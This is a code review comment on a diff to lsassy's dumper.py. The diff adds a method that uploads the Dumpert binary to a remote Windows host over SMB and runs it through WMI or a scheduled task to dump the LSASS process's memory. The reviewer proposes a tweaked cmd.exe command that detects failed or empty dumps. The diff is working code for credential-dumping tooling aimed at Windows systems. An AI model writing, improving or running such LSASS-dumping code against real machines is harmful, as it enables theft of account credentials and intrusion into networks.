lsassy/dumper.py

```diff
@@ -189,6 +202,45 @@ def procdump_dump(self, exec_methods=("wmi", "task")):
                     self._log.debug("Error : {}".format(str(e)))
             return RetCode(ERROR_WMI_NO_EXECUTE)
 
+    def dumpert_dump(self, exec_methods=("wmi", "task")):
+        """
+        Dump lsass with dumpert
+        :param exec_methods: If set, it will use specified execution method. Default to WMI, then TASK
+        """
+        if not self._dumpert_path:
+            self._log.warning("dumpert path has not been provided")
+            return RetCode(ERROR_DUMPERT_NOT_PROVIDED)
+
+        # Upload dumpert
+        self._log.debug('Copy {} to {}'.format(self._dumpert_path, self._tmp_dir))
+        with open(self._dumpert_path, 'rb') as dumpert:
+            try:
+                self._conn.putFile(self._share, self._tmp_dir + self._dumpert, dumpert.read)
+            except Exception as e:
+                return RetCode(ERROR_DUMPERT_NOT_UPLOADED)
+        self.dumpert = True
+
+        # Dump lsass using PID
+        command = """cmd.exe /Q /c {}{} & if NOT EXIST {}{} (echo FAILED > {}{})""".format(
```

Comment:
Line 224 should be changed to:

`command = """cmd.exe /Q /c {}{} & for %A in ({}{}) do IF NOT EXIST %A ( echo FAILED > %A ) ELSE IF %~zA==0 ( echo FAILED > %A )""".format`

The format line also needs to updated to have one less of `self._tmp_dir, self._remote_lsass_dump` since the for variable is not referencing the file instead of hardcoding it.